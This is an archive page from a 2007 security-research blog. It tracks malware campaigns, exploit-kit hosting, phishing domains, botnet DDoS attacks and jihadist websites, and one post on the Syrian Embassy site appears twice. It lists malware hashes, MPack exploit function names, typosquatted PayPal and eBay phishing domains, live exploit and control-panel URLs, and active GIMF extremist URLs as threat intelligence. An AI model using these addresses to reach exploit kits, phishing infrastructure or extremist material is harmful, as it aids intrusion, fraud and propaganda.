Sunday, September 30, 2007

Don't Play Poker on an Infected Table

The scammy Euro VIP Casino is making another round this afternoon and trying to entice the spammed European users into downloading its software by promising $400 as a welcome bonus. Needless to say you ought to ignore it. Here's a full list of the typosquatted domains serving the scams.

Detection rate : Result: 11/32 (34.38%)
File size: 461341 bytes
MD5: e68763c16f31de340681b2c7c7eb6b0e
SHA1: 6174960cf5a6c503b97c9160f5e6a5babfef96e9

Online gambling is a buzz Internet activity allowing malicious parties to enjoy the "pull effect" by end users who themselves look for and download such applications. In this spamming campaign, however, we have a combination of a "push" approach, segmentation targeting European users, social engineering in the form of a promotion, and typosquatting. The first campaign (SetupCasino.exe) is currently hosted in China (116.199.136.29) on a host managing a second online gambling scam campaign impersonating Golden Gate Casino (SmartDownload.exe) under the following domains topgamecasino.net; superroyalcasino.com; nlymycasino.cn; lookforcasino.cn

Zero Day Vulnerabilities Market Model Gone Wrong

It's one thing to allow legitimate buyers, presumably the affected vendors themselves to bid for a zero day vulnerability discovered within their products in order to provide financial incentive for the researcher that discovered the flaw, another to superficially increase the monetary value of a zero day vulnerability taking advantage of its vendor-added exclusiveness, but entirely another to position responsible disclosure as an exclusive courteousness. Here's a sample letter informing the company within whose products a vulnerability has been found, and yes, the ultimatum for not releasing it :

"We've discovered an attack against the LinkedIn toolbar. If you are interested in the bug, we would like to give first right of refusal to purchase it. We'd also like to perform a more complete security audit of your products. We can help make the LinkedIn products more secure," DeMott stated in e-mail sent to LinkedIn on July 10, as viewed by CNET News.com. The e-mail continues: "If you wouldn't like to buy it then we are happy to resell or release as a full disclosure to help prevent security issues arising on end users servers. We strongly believe in keeping users safe. We are unique in that we give vendors a first chance at the bugs we discover rather than selling to a third-party or releasing publicly. Please find the VDA Labs Value add document attached. If you'd like to buy the bug we will provide working attack code, so that you can verify the bug, before you send the check." VDA set a deadline of July 17 and requested a payment of $5,000."

I first mentioned the possibility of having a security researcher blackmail an affected party a long time ago, however, I never thought it would be a company with serious knowledge in the field that's setting ultimatums, doubling the requested amount for the vulnerabilities if the vendor delays the response and threatening to release a PoC in a full disclosure style. Getting paid for getting hacked in reverse order - getting hacked for not paying. However, the ugly reality goes that what's a zero day for the mainstream media today is last month's zero day for the underground that's been improving the chances of success of their targeted attacks against a specific company or an individual. That's of course in the rare cases when malware authors no longer keep it simple, the stupids.

Here's another article on this story. Image courtesy of eEye's Zero Day Tracker.

Saturday, September 29, 2007

DIY Chinese Passwords Stealer

This DIY passwords stealer courtesy of a chinese hacking group is pitched as Vista Compatible, with a server size in less than 20kb, process injection, form grabbing and password stealing capabilities for anything keyloggable, anti virus software killing capabilities, and uploading of the results to a central location, in this particular case an example is given for notification via Tencent, China's main IM network. More info :

"Backdoor.Hupigon.GEN has rootkit functionality. It injects itself into Internet Explorer causing IE to hide itself. It also logs keystrokes and sends this information to remote servers."

Detection rate of the builder: Result: 15/32 (46.88%)
File size: 267213 bytes
MD5: a4b9c9f42629865c542ac7b823982843
SHA1: 78f855843d312ab76e1f8f0b912bd475781a8864

Here are several more recent releases by Chinese hacking groups, as well as a comment on the big picture.

A New DDoS Malware Kit in the Wild

On the majority of occasions, malware authors either put efforts into implementing a set of standard features within a malware enabling them to send out spam, use the already infected hosts as future infection and propagation vectors, or entirely outsource the features by releasing the malware as open source one. On the other hand, certain malware authors seem to avoid diversification and tend to stick to core competencies only, in this case a DDoS ready infected host as its only function, thereby decreasing the file size of the malware and sort of improving its stealthiness by putting the infected host in a passive "on demand" state compared to a situation where the host is already sending out spam and phishing emails could be much more easily identified as an infected one and its DDoS capability could turn irrelevant due the malware's multi tasking activities.

This specific DDoS malware kit currently offered for sale includes the standard firewall bypassing and rootkit capabilities, in between offering the possibility for zero day malware on demand once previous instances of the bot in question achieve a high detection rate. Moreover, in between providing custom DDoS capabilities like the ones I discussed in a previous post, it's yet another indication of the ongoing Web-ization of botnet communications which I think is about to replace the default use of the IRC command and control in the long term.

Friday, September 28, 2007

Syrian Embassy in London Serving Malware

After Bank of India was serving malware in August, next to the U.S Consulate in St.Petersburg two days later in September, now the Syrian Embassy in London is the latest victim of a popular malware embedding attack which took place between the 21st and 24th of September. As obfuscating the IFRAMEs in order to make it harder for a security researcher to conduct CYBERINT is about to become a commodity with the feature implemented within the now commoditized malware kits, it's interesting to note that in this particular attack the attackers took advantage of different javascript obfuscations, and that once control of the domain was obtained, scam pages were uploaded on the embassy's server. The embassy had recently removed the malicious IFRAMEs, but the third one remains active acting as a counter for the malicious campaign.

Which domains act as infection vectors?

sicil.info/forum/index.php and sicil.info/g/index.php (203.121.79.71) using patched vulnerabilities exploited in the usual MPack style :

function setslice_exploit
function vml_exploit
function firefox_exploit
function firefox1_exploit
function wmplayer_exploit
function qtime_exploit
function yahoo_e
function winzip_exploit
function flash_exploit
function w2k_ex

0ki.ru/forum/index.php (80.91.191.224) where a WebAttacker launches several other exploits, and x12345.org/img/counter.php?out=1189360677 (66.36.243.97)


What are the malware authors trying to infect the visitors with?

A Banker Trojan with a low detection rate :

BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack
Ikarus 2007.09.28 Trojan.Delf.NEB
Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen
Symantec 2007.09.28 Infostealer.Banker.C

98shd3.exe
File size: 65024 bytes
MD5: ef98a662c72e3227d5c4bb3465133040
SHA1: e5b9b216d77de977848f8791850c726b45fc18c2

Think malware authors were virtually satisfied to only have the visitors infected with the malware? Not at all. This is perhaps the first but definitely not the last time I see an embassy hosting pharmaceutical scam pages and ring tone ones. List of historically hosted scam pages :

syrianembassy.co.uk/news/lv/levitra-vs-viagra.htm
syrianembassy.co.uk/news/lv/buy-levitra.htm
syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm
syrianembassy.co.uk/news/xa/cheap-discount.htm-group.com-herbal-xanax-xnx.htm
syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm
syrianembassy.co.uk/news/xa/buy-site-xanax.htm
syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm

UPDATE :
The folks at ScanSafe contacted me to point out that they've discovered the malware at the Syrian embassy on the 12th of August providing us with more insights on how long the attackers had access to the embassy's site. In ScanSafe's example, different malicious URLs (miron555.org/s/index.php) were rotated compared to the ones used during 21/24 of September. And given the embassy's site states it was last updated in 2005, cleaning it up and ensuring the attackers no longer have access to it may take a while.

Thursday, September 27, 2007

Syrian Embassy in London Serving Malware

After Bank of India was serving malware in August, next to the U.S Consulate in St.Petersburg two days later in September, now the Syrian Embassy in London is the latest victim of a popular malware embedding attack which took place between the 21st and 24th of September.

As obfuscating the IFRAMEs in order to make it harder for a security researcher to conduct CYBERINT is about to become a commodity with the feature implemented within the now commoditized malware kits, it's interesting to note that in this particular attack the attackers took advantage of different javascript obfuscations, and that once control of the domain was obtained, scam pages were uploaded on the

embassy's server. The embassy had recently removed the malicious IFRAMEs, but the third one remains active acting as a counter for the malicious campaign.

Which domains act as infection vectors?

sicil.info/forum/index.php and sicil.info/g/index.php (203.121.79.71) using patched vulnerabilities exploited in the usual MPack style :

function setslice_exploit
function vml_exploit
function firefox_exploit
function firefox1_exploit
function wmplayer_exploit
function qtime_exploit
function yahoo_e
function winzip_exploit
function flash_exploit
function w2k_ex

0ki.ru/forum/index.php (80.91.191.224) where a WebAttacker launches several other exploits, and x12345.org/img/counter.php?out=1189360677 (66.36.243.97)

What are the malware authors trying to infect the visitors with?

A Banker Trojan with a low detection rate :

BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack
Ikarus 2007.09.28 Trojan.Delf.NEB
Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen
Symantec 2007.09.28 Infostealer.Banker.C

98shd3.exe
File size: 65024 bytes
MD5: ef98a662c72e3227d5c4bb3465133040
SHA1: e5b9b216d77de977848f8791850c726b45fc18c2

Think malware authors were virtually satisfied to only have the visitors infected with the malware? Not at all. This is perhaps the first but definitely not the last time I see an embassy hosting pharmaceutical scam pages and ring tone ones. List of historically hosted scam pages :

syrianembassy.co.uk/news/lv/levitra-vs-viagra.htm
syrianembassy.co.uk/news/lv/buy-levitra.htm
syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm
syrianembassy.co.uk/news/xa/cheap-discount.htm-group.com-herbal-xanax-xnx.htm
syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm
syrianembassy.co.uk/news/xa/buy-site-xanax.htm
syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm

UPDATE :
The folks at ScanSafe contacted me to point out that they've discovered the malware at the Syrian embassy on the 12th of August providing us with more insights on how long the attackers had access to the embassy's site.

In ScanSafe's example, different malicious URLs (miron555.org/s/index.php) were rotated compared to the ones used during 21/24 of September. And given the embassy's site states it was last updated in 2005, cleaning it up and ensuring the attackers no longer have access to it may take a while.

Wednesday, September 26, 2007

A New Issue of (IN)Secure Magazine "in the Wild"

(IN)Secure Magazine's Issue 13 was released yesterday, and as always is definitely worth printing out. What is (IN)Secure Magazine? (IN)Secure Magazine is the type of "too good to be for free" kind of publication, covering the information security industry, the newly emerging technologies and threats, as well as the people who put it all together.

It's also great to note that my blog has been featured in their new section at page 62, an indication for an upcoming flood of an even more quality audience, and a personal incentive to contribute to a future issue of the magazine with a qualitative research on zero day vulnerability markets I've been working on for a while.

China's Cyber Espionage Ambitions

Must have been slow news week, so slow that all of a sudden Germany, the U.K, France, New Zealand, and the U.S got hacked by China's cyber spies. "Poor China" not just denied, but also admitted of getting hacked by supposedly one of the countries that started the alligations. Pretty much all the news articles basically enjoying the media-echo effect exclude the reality as an issue, namely that each of the country that's blaming China for cyber espionage, has been developing its own offensive cyber warfare capabilities for years. Some of the good examples to illustrate the diverse topic are for instance, North Korea's Cyber Warfare Unit 121 that was originally started in order for North Korea to balance its lack of conventional weaponry capabilities by improving its asymmetric warfare ones, passive cyber espionage in the form of gathering OSINT Through Botnets, releasing DIY attack tools in times of hacktivism tensions, or the healthy paranoia posed by the fear of now Chinese owned Lenovo could be implementing hardware backdoors in between China's recent interest in buying Seagate Technology fueling the tensions even further.

In a nation2nation cyber warfare scenario, the country that's relying on and empowering its citizens with cyber warfare or CYBERINT capabilities, will win over the country that's dedicating special units for both defensive and offensive activities, something China's that's been copying attitude from the U.S military thinkers, is already envisioning :

"It also put forward the concept of a "people's information war" for the first time, describing this as a form of national non-symmetric warfare, with the people at the core, computers as the weapons, knowledge as the ammunition and the enemy's information network as the battlefield. These experts believe that ordinary people can be mobilized to provide global information support, spread global propaganda and conduct global psychological warfare. Such attacks could be launched from anywhere in the world at the enemy's military, political and economic information systems. If necessary, the experts suggested, computers currently under the control of Chinese enterprises could be dispersed among the people and connected to volunteer Web portals around the world, which would become a combined strategic cyber attack force. The article concluded by emphasizing that training "hacker warriors" should be a priority within the Chinese military."

All warfare is indeed based on deception. Go thought a related post on the The Biggest Military Hacks of All Time as well, and if objectivity is important to you, ask yourself the following, or question the lack of its answer within an article stating a country did something :

Was it the NSANet, the Joint Worldwide Intelligence Communications System [JWICS], the Secret Internet Protocol Router Network (SIPRNET), or the Unclassified but Sensitive Internet Protocol Router Network (NIPRNet) actually breached?

Cover courtesy of Der Spiegel.

Localizing Open Source Malware

Can you find the differences in this piece of malware compared to the previous open source one I covered recently? Besides its localization to Chinese there aren't any, and this development clearly demonstrates the dynamics of the malware scene. A common Web 2.0 mentality is that the more people use the service, the better it gets, a mode of thinking we could see applied in the case of open source malware, and malware as a web service. Once the source code becomes publicly obtainable, it's not just new features and modules that get introduced, but also, the malware starts using the Web as a platform. In fact, some of the most popular open source malware codes are successfully building communities around their open source nature, thus, attracting "malicious innovation" on behalf of third-party coders. Should we therefore make a distinction between a malware author, and a malware module coder?

Monday, September 24, 2007

The Dark Web and Cyber Jihad

It's interesting to monitor the use and abuse of the buzz word "Dark Web". This press release for instance, tries to imply that the crawlers are actually crawling the Dark Web and analyzing cyber jihadist activities, a bit of an awkward statement given what the Dark Web is at the bottom line - a web that is closed for web crawlers either thought standard measures, or authentication :

"This is where the Dark Web project comes in. Using advanced techniques such as Web spidering, link analysis, content analysis, authorship analysis, sentiment analysis and multimedia analysis, Chen and his team can find, catalogue and analyze extremist activities online. According to Chen, scenarios involving vast amounts of information and data points are ideal challenges for computational scientists, who use the power of advanced computers and applications to find patterns and connections where humans can not. One of the tools developed by Dark Web is a technique called Writeprint, which automatically extracts thousands of multilingual, structural, and semantic features to determine who is creating 'anonymous' content online. Writeprint can look at a posting on an online bulletin board, for example, and compare it with writings found elsewhere on the Internet. By analyzing these certain features, it can determine with more than 95 percent accuracy if the author has produced other content in the past. The system can then alert analysts when the same author produces new content, as well as where on the Internet the content is being copied, linked to or discussed."

I've blogged about this AI project over an year ago, and have been following it ever since while experimenting with link and multimedia analysis of cyber jihadist communities before they were shut down. And while the innovations they've introduced for this period are impressive in terms of drawing social networking maps, the Dark Web's very principle, namely that it's authentication only Web, meaning it's closed for spiders, even human based researchers thought basic invite only or password authentication methods will prompt researchers to adapt in the long-term. Many of the cyber jihadist forums I didn't include in my last external links extraction were great examples of the dark cyber jihadist web, knowing where you crawl doesn't mean there'll be anything publicly available to crawl, and the trend is just starting to emerge. Such VIP clubs represent closed communities where more efforts should be put in taking a peek, thus it's ruining previous efficiency centered approaches of analyzing cyber jihadist communities. The alternatives remain rather contradictive but fully realistic - infecting terrorist suspects with malware, embedding malware within cyber jihadist communities, or unethically pen-testing the cyber jihadist communities to have the AI analyze the data obtained from the closed community, thus the Dark Web, at a later stage.

Meanwhile, after having the Global Islamic Media Front's online presence limited to the minimum, GIMF is making it in the mainstream media :

"On sites easily traceable via search engines, the German-language arm of the "Global Islamic Media Front" (GIMF) appeals for volunteer translators, inviting them to reply to a Hotmail address, and posts links to dozens of al Qaeda videos. "After some brothers and sisters were arrested (may Allah free them) and the Forum and blog of the GIMF were removed, we say this: the GIMF still exists and will continue its work," a statement from the front says. "To the Kuffar (infidels) who try to fight us, we say: you can do what you like, make as many arrests as you like...you will not reach your goal. We will always keep going until we achieve victory or martyrdom."The re-emergence of the GIMF in German highlights the difficulty for authorities of shutting down radical Islamist Web sites, which often simply spring up at new addresses."

Easily traceable mainly because they're not behind the Dark Web, at least not for now. Currently active GIMF URLs :

gimf.12gbfree.com
gimf.22web.net
gimf.cjb.net
gimfupload.blogspot.com with two redirectors gimfupload.notlong.com ; gimfupload.2ya.com

Despite that there're still literally hundreds of cyber jihadist forums and sites, quantity is not always equal to quality, namely, only a few of these will achieve success and mature into potentially dangerous communities. In the long term, however, once the "tip of the iceberg" communities dissapear, efficiency from the cyber jihadists will get sacrificed for improved OPSEC, namely they'll start operating behind the true Dark Web, making them more difficult and time-consuming to assess, track down, and shut down.

UPDATE: Inshallahshaheed (GIMF) has a new home.

Friday, September 21, 2007

The Truth Serum - Have a Drink!

Which security vendor would you rather choose if you were to ignore your current Return on Security Investment model? The one telling you "everything's under control" , that "malicious attackers are loosing creativity and cannot bypass our security solutions", or the one who's attitude is "our solutions fully demonstrate marginal thinking in respect to fighting cyber threats, namely, they mitigate certain risks and limit the probability for a security incident, but do not and cannot provide 100% security"?

Basic human psychology and purchasing habits would stick to the first one, the one pretending to offer 100% security -- something even a condom cannot offer yet everyone's thankfully using them. Even worse, which is falling victim into the myopia that the market leader, or the company with the highest brand equity is actually the one worth doing business with. As it appears, McAfee CEO David DeWalt had a drink from the truth serum before InformationWeek's 500 Conference in order to comment that "We're in inning two of a nine-inning game here" in respect to how cyber threats often outpace security measures. Moreover, an year ago I commented on a Gartner analyst's statement that security is all about percentage of budget allocation, and therefore the more you spend the more secure you get, among the most common myopias nowadays. Now, Gartner vice-president John Pescatore is wisely insisting that companies spend less on IT security, and given how when Gartner sneezes the whole industry gets cold, it's a step in the right direction - debunking common security myopias.

In a world dominated by perimeter defense solutions, being a visionary realist is an objective luxury.

Thursday, September 20, 2007

DIY Phishing Kit Goes 2.0

With the release of the second version of the DIY phishing kit that I covered in a previous post, next to commentary on another one and a DIY pharming tool, the timeframe for creating a phishing page just got shorter than it used to be before. Moreover, the phishing ecosystem is getting closer to fully achieving its malicious economies of scale, ones where the number of phishing campaigns in the wild outpaces the possibilities for timely shutting them down. Even worse, phishers do not seem to be interested in re-inventing the wheel, and having to create a new phishing page for any site or service, instead, such phishing pages are now a commodity, and with the ecosystem itself clearly cooperating with malware authors, you end up in a situation where a malware infected host is not just hosting malware for the next victim to get infected, running multiple DNS servers, sending out spam and phishing emails, but also, hosting the phishing pages themselves.

Amateur phishers do not put efforts into ensuring the quality and the lifetime of their phishing campaigns, and you can clearly recognize such amateur campaign by visiting the phishing URL you've just received to figure out it's already down. The more sophisticated phishers, however, are not just efficiency-obsessed, but also, take advantage of typosquatting and basic segmentation approaches, for instance, acquiring a Russian email database to use as the foundation for a WebMoney phishing campaign, and a U.S one for a PayPal one. Moreover, sophisticated phishers also put more efforts and invest more time into personalizing the emails and in rare cases, the phishing pages themsleves, that's of course in between localizing the campaign by having it translated into the local language of the country for which the emails database belongs to, thus improving the chances of the campaign. This is yet another disturbing trend worth commenting on - malware is maturing into a services centered economy, and so is the case with spamming and phishing, a logical development with the commodization of what used to very exclusive tools.

What are the major improvements in the new version? In the first one, the phisher had to manually paste the source code of the real page, have the kit automatically redirect the data to a third party URL, and also manually fix the image locations to ensure that they will load properly. In the second version, there're POST and GET commands available so that the source code gets acquired automatically, and an internal Image Grabber so that the exact URLs of all the images within the login page can get easily integrated within the phishing page about to get generated. Getting back to differentiating the amateur from sophisticated phishers, the second have more resources at their disposal and better confidence in their hosting provider so that compared to loading the images from the original site, they're hosting them locally. This kit will inevitably continue to evolve, wish it was proportionally with the end user's understanding of how to protect against "push" phishing attacks though.

Related posts:
Taking Down Phishing Sites - A Business Model?

Wednesday, September 19, 2007

Custom DDoS Capabilities Within a Malware

DDoS capabilities within a malware are nothing new and are in fact becoming a commodity feature, but compared to the average DDoS-ers with up to two different DoS attack approaches, or the types of malware with hardcoded IPs to be attacked, there's a disturbing trend to diversify the DoS techniques used as much as possible to improve the chances of a successful attack, let's not mention the allocation of automatic self-defensive DDoS back at curious parties due to the oversupply of infected hosts. As you can see in this particular malware -- high detection rate -- the DDoS variables within are not only diverse enough to cause a lot of damage, but also, simultaneous combinations are also possible.

Now comes the digitally ugly part. Open source malware results in many different variants with a huge variety of new modules and options implemented within, even worse, the software client can indeed mature into a web based malware C&C like the ones we've been seeing since the beginning of 2007. And this is exactly what happened with this open source malware - a Chinese hacking team is currently offering a Web builder for sale, making it possible to integrate the malware on the Web in a typical do-it-yourself fashion. What types of attacks are included anyway :

- ICMP/SYN/TCP and UDP flooding
- HTTP no-cache, GET flooding
- CC variety
- GAME, CIDR, Hybrid flooding capabilities

The Black Sun bot, the Cyber bot, MPack, IcePack, WebAttacker, the Nuclear Malware Kit and Zunker, are all Web based malware platforms and were originally released as such compared to the Web adaption of this one.

Two Cyber Jihadist Blogs Now Offline

Jihad Fields are Calling and The Ignored Puzzle of Knowledge are down, apparently the authors themselves decided to delete them compared to Wordpress shutting down the Global Islamic Media Front like it happened before. Ensuring that these "tip of the iceberg" cyber jihadist communities stay offline has a long-term PSYOPS effect on future wannabe cyber jihadists wanting to operate such communities, ones where talkers eventually turn into doers.

Monday, September 17, 2007

A Chinese Malware Downloader in the Wild

This is an example of a recently released in the wild DIY downloader with rather average features such as the ability for the malware author to choose multiple locations of the files to be "dropped", as well as the time interval to check for the newly distributed binaries. The high detection rate of the downloader itself -- Result: 23/32 (71.88%) -- is not the main point I'd like to emphasize on, but rather that compared to the majority of downloaders courtesy of Russian malware authors I come across to occasionally, this is a Chinese one. China is often blamed to be the country hosting the highest percentage of malware in the world, however, China is also the country with highest percentage of infected PCs, and as we've seen with Storm Worm an infected host starts acting as both infection and propagation vector for the malware in question. As in any other local malware market, DIY tools get released so that script kiddies can generate enough noise to keep the more sophisticated malware campaigns running behind the curtains.

PayPal and Ebay Phishing Domains

As I needed another benchmark for a creative typosquatting next to my best finding of this World of Warcraft domain scam, I stumbled upon the following list of domains, where the most creative domain squatting is done solely for the purpose of including the domains within a typical phishing scam URL structure. Some of the domains are actual Rock Phish ones that are currently hosting live phishing campaigns :

paypal-online-account.com
paypal-user-update.com
paypal-support1.com
paypal-account-protection.com
paypal1-login.com
paypal-accounts-update.com

Some "creative" ones to be abused :

paypal-aspx.com
paypal-cgi3.info
paypal-cmd.com
paypal-comlwebscrc-login-run.com
paypal-confirmation-id-0746795.com

And since PayPal is actually EBay after the acqusition, here're some "creative" Ebay domain scams as well :

ebay-com-isapidll.com
ebayisapidll-cgi.com
ebayisapidllaw2.com
ebayisapidllu.com

Authentication itself seems to be a priority as the customer must possess a tangible proof that her transactions' security is somehow enhanced by a layered authentication, no doubt about it. But with phishers actively using a "push" model that is starting to visually social engineer the customers by registering domains imitating PayPal and EBay's web application structure, authentication itself shouldn't be a priority number one the way it is for the time being as phishers are not even trying to bypass it.

Stats courtesy of the Anti-Phishing Working Group.

Storm Worm's DDoS Attitude - Part Two

After commenting on Storm Worm's logical connection with the recent DDoS attacks against anti-scam web sites, SecureWorks timely released details of what actions could trigger a DDoS attack from Storm back at the researcher's host and what type of DDoS attacks are launched exactly :

"The attacks do show signs of being automated. Certain actions reliably trigger attacks. Investigators who can withstand the onslaught and have decided to test their theories (with cooperation from their ISPs, of course) can reliably trigger DDoS attacks on themselves. In one case, probing more than four unique Peacomm botnet HTTP proxies within ten seconds results in a flood of TCP SYN and ICMP packets, which last for about two hours. That’s all fairly regular."

To me, this tactic is more of a "hey our situational awareness on your actions to shut us down is fairly food enough" type of statement, but why would the botnet masters risk exposing infected hosts compared to the opportunity to have them act like nothing's in fact wrong with them? Mainly because if infected hosts were a scarce resource perhaps they would, but in Storm Worm's case the oversupply of infected hosts is allowing them to dedicate resources for automatic self-defensive DDoS.

Friday, September 14, 2007

U.S Consulate St. Petersburg Serving Malware

If that's not a pattern and good timing, it's a malicious anomaly. On the 31 of August, 2007, Bank of India was serving malware courtesy of the Russian Business Network. This week, evidence that the U.S Consulate in St. Petersburg, Russia was serving malware to its visitors proved to be true. The web site is now clean, but assessing the IFRAME-ed URLs used in the attack is possible as they're still reachable. It's still unknown for long the IFRAMEs remain embedded at the Consulate's web site, as well as when were they cleaned, but the attack was still active on the 2nd of September, 2007, just two days after Bank of India's malware attack. It's also worth mentioning that compared to the most recent malware embedded attacks which had the IFRAMEs directly embedded within, in this one the IFRAME itself is obfuscated but the live exploit URL isn't.

Tipped by a third-party, Sophos managed to locate the exact URL by deobfuscating the rather simple URL obfuscation, and Fraser Howard posted some interesting details at their blog :

"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential. So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack - my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites."

We could greatly expand those as a matter of fact. The IFRAME used leads us to verymonkey.com/goof/index.php (209.123.181.185) and verymonkey.com/test/index.php which is exploiting a modified MDAC, and aims to execute the following binary Virus.Win32.Zapchast.DA :

Detection rate : Result: 6/32 (18.75%)
AntiVir 2007.09.14 DR/Delphi.Gen
AVG 2007.09.14 Obfustat.NPJ
eSafe 2007.09.13 Suspicious Trojan/Worm
Ikarus 2007.09.14 Virus.Win32.Zapchast.DA
VirusBuster 2007.09.13 Trojan.Agent.JVF
Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen

File size: 28672 bytes
MD5: a25ad0045d195016690b299bfb8b75d1
SHA1: ab219c50b0adc84f702c696797e81411b6eab596

Is this obfuscated IFRAME-ing a fad or a trend? I think it's a trend since IFRAME-ing to a secondary domain taking advantage of popular web malware exploitation techniques is already rated as suspicious by security vendors, and Google themselves warning you that "this site may harm your computer", and so they ought to win time. Moreover, such obfuscations are making it harder to assess how many sites and which ones exactly were victims of the attack in an OSINT manner. It gets even more interesting, the IP hosting verymonkey.com was historically used to host banksoffscotland.co.uk scam web site in March this year. In case you wonder, it's not the RBN that's behind this malware embedded attack, but let's say it's a subsidiary of the RBN.

Wednesday, September 12, 2007

209 Host Locked

Ever came across this fake error message? A "209 Host Locked" message on a fraudulent domain is the default indication that you're on a Rock Phish domain, that is a single domain hosting multiple phishing campaigns aimed at different financial institutions. And as more Royal Bank of Scotland phishing emails are cirtulating in the wild, these very same emails pointed me to a Chinese Rock Phish campaign which was shut down as of yesterday. What is different in this campaign, compared to the previous one? The phishers put more efforts into ensuring the phishing email gets through spam filters by using spacing, adding _ in front of random words, as well as the usual garbage content at the end of the email. All the URLs within the campaign are already in the Phishtank, DSLreports.com's wisdom of the anti-phishers crowd continues exposing Rock Phish domains on a daily basis, an effort worth keeping track of.

The Rock Phish Kit is the logical evolution from DIY phishing kits like the one I've already blogged about, however, both concepts are not mutually exclusive but apparently tend to work together. The DIY phishing kits on their part are largely used in the planning stage of the phishing campaign, that is, fake sites get generated and the data obtained forwarded to a single place, which is where Rock Phish starts getting used, namely, in the execution stage, where all the phishing pages generated get hosted on a single domain. Phishing efficiency vs Rock Phish's weakness due to centralization of numerous campaigns on a single domain - it's the phishers' trade-off. Within the phishing ecosystem, there's are numerous approaches phishers tend to use to achieve maximum efficiency, ones I've already discussed in a previous post. The most prolific problem to me remains phishing 1.0's "push" model that is still remarkably successful compared to the more advanced man in the middle phishing attacks and pharming. From my perspective, if a financial institution really wants to protect its customers from phishing scams, it would first segment the threat, evaluate its customer's perception of it and current level of awareness, and then start an educational campaign aiming to not teach them how to recognize whether a site is a phish or not, but how to report and ignore the "push" models emails that arrive in their mailboxes. From another rather pragmatic perspective, phishers don't just load images for their phish emails from the company's website, but also the majority of phishing emails redirect to the real web site after the data was submitted - an early warning system by itself.

Tuesday, September 11, 2007

Storm Worm's DDoS Attitude

Stage one - infect as many end users with high speed Internet access as possible through the use of client side vulnerabilities. Stage two - ensure the longest possible lifecycle for the malware campaign by having the newly released binaries hosted at the infected PCs themselves. Stage three - take advantage of fast-flux networks to make it harder to shut down the entire botnet. And stage four - strike back at any security researcher or vendor playing around with Storm Worm's fast-flux network or somehow messing up with the malicious economies of scale on a worldwide basis. On Friday I received an email from Susan Williams at aa419.org, and as it looks like several other anti-fraud sites are getting DDoS-ed too :

"On September 2 2007, online scammers began an automated DDoS attack against aa419.org, with the goal of shutting down the anti-fraud site. For some time, aa419 was able to filter the worldwide botnet's attacks by monitoring connections and only allowing legitimate visitors to access thesite. However, by September 5 the hoster was being overwhelmed with nearly 400 GB of incoming requests every hour. Rather than let their infrastructure melt under the onslaught, the server is currently offline. This massive distributed denial of service (DDoS) attack was inspired by aa419.org's mission to blacklist and shut down scam web sites. Since 2004, the all-volunteer organization has recorded more than 18,000 such sites. In addition to publicly warning potential victims of fraud, they work with hosters and registrars to take scam web sites offline quickly, with a success rate of over 97% shut down. Susan Williams, press officer for aa419.org, said, "On the whole, we're positive about this. Not that we enjoy being offline; quite the opposite. But being attacked with a botnet of this magnitude tells us that we are doing serious damage to the organized crime networks that run these scams." Internet crime is increasing at record rates, and aa419.org is at the forefront of the fight against it. "We will continue our work regardless of how many criminals are annoyed by it," Williams said."

Castlecops comments on the DDoS taking place at the site too :

"This newest ddos round started about a week ago and knocked us offline for a couple hours while we figured out what was going on. And we're still under attack, so if the site is a bit slower, you know why. Odd month really, lots of sites, lots of sites, are under ddos. We've got over 10k bots attacking us with more being added daily."

As a friend recently pointed out - you ain't making a difference until you start getting DDoS-ed.

Cartoon courtesy of Joyoftech.com, here're more courtesy of myself.

Related posts:
The War against botnets and DDoS attacks
Emerging DDoS Attack Trends
DDoS On Demand vs DDoS Extortion

Monday, September 10, 2007

Google Hacking for MPacks, Zunkers and WebAttackers

If wannabe botnet masters really wanted to hide their activities online, they would have blocked Google's crawlers from indexing their default malware kit installations, and changed the default installation settings to random directory and filename, wouldn't they? Apparently, a default deny:all rule for anyone but the botnet masters doesn't exist as a principle among botnet amateurs, which leaves us with lots of malware campaigns to assess and shut down.

The following are IPs and domain names currently or historically used to host MPack, WebAttacker and Zunker control panels, as well as live exploit URLs within the packs. Some are down, others are still accessible, the rest are publicly cached. If index.php doesn't exist, admin.php or zu.php act as the default admin panel.

MPack Malware Campaigns :

wmigra.org/mpack/index.php
64.62.137.149/~edit/
81.95.145.240/logo/
81.95.150.42/MPack091cbt/index.php
brbody.info/mpack/index.php
innaidina.info/mpack/index.php
rallyesimages.ch/liens/test/
sol.h18.ru/mpack/index.php
81.95.145.240/logo/
icqmir.iplot.ru/mpack/index.php
cordon.ru/mp/
havephun.org/mpack/index.php
xbr.ru/images/old/mpack/index.php
evil-x.org/spk2/
tyt-menia.net/mpack/index.php
rufat.info/mpack/index.php
iwiw-hosting.com/upload/
stepbystepbg.org/img/
mydulichusa.com/mpack/index.php
csextra.wz.cz/weapons/mpack/index.php
d34thnation.com/mpack/index.php
mp3fans.org/mpack084/
innaidina.info/mpack/

WebAttacker's Hosts :

secondsite2.com/cgi-bin/ie0604.cgi
lsdman.info/cgi-bin/ie0604.cgi?bug=MS05-001&SP1
telecarrier.es/cgi-bin/ie0604.cgi
stmare.info/cgi-bin/ie0604.cgi
redcrossonline.cn/cgi-bin/ie0604.cgi

Zunker's C&C :

66.148.74.7/zu/
bundeswehrzentrale.org
skilltests.org/zu/zc.php
zup.secondsite1.com/zu/index.php
stat1.realstatscollect.com/zu/
webcounterstat.info/zu/

I also find it very interesting to see VeriSign publicly admitting of hacking into the hosts behind the malware kits -- the Russian Business Network in this case -- to assess the damages done in the form of number of infected PCs and with what exactly :

